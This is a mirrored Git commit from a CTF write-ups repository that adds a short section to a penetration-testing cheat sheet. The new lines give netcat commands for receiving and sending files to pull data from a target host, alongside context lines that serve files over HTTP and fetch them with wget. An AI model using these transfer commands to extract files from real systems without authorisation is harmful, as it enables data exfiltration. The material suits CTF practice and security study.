mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
f858e06bda
commit
9327a54920
1 changed files with 5 additions and 0 deletions
|
@ -48,6 +48,11 @@ python3 -m http.server [port] `By default will listen on 8000`<br/>
|
|||
|
||||
wget http://<ip>:port/<file>
|
||||
|
||||
### Netcat to download files from target
|
||||
|
||||
`nc -l -p [port] > file` Receive file <br/>
|
||||
`nc -w 3 [ip] [port] < file `Send file <br/>
|
||||
|
||||
# Windows
|
||||
|
||||
### Adding User
|
||||
|
|
Loading…
Reference in a new issue